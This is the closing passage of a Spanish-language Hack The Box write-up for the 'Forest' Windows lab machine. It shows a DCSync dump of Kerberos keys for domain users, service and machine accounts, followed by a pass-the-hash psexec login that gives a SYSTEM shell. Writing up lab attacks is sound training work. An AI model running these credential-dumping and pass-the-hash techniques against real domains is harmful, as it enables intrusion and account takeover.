htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
pwned:aes256-cts-hmac-sha1-96:589fc925dde5ff92c332cd03d0f85f63903fac63728d60d918428884ce7e0fde
pwned:aes128-cts-hmac-sha1-96:73bcd50c4d38d9c4d3eb6a48198b64c9
pwned:des-cbc-md5:015dea43e06eae62
FOREST$:aes256-cts-hmac-sha1-96:f03e52cb7523aa69a5d773d79ed0a257883b0b51719bb50a7ba3e0f93dfc5929
FOREST$:aes128-cts-hmac-sha1-96:41ec884af3525c3444c0c0014bfc6478
FOREST$:des-cbc-md5:6e1979cb151f0eb3
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

Nos conectamos con psexec haciendo Pass The Hash a la máquina víctima

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# impacket-psexec 'htb.local/administrator@10.129.238.223' -hashes ':32693b11e6aa90eb43d32c72a07ceea6'              
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[*] Requesting shares on 10.129.238.223.....
[*] Found writable share ADMIN$
[*] Uploading file bEjjbOBr.exe
[*] Opening SVCManager on 10.129.238.223.....
[*] Creating service FeTP on 10.129.238.223.....
[*] Starting service FeTP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
Hackthebox, Windows
Local RPC Enumeration AS-RepRoast Attack Cracking Hashes Abusing WinRM BloodHound Enumeration Gathering system information with SharpHound.ps1 Representing and visualizing data in BloodHound Finding an attack vector in BloodHound Abusing Account Operators Group Abusing Account Operators Group Abusing WriteDacl in the domain DCSync Exploitation
Esta entrada está licenciada bajo CC BY 4.0 por el autor.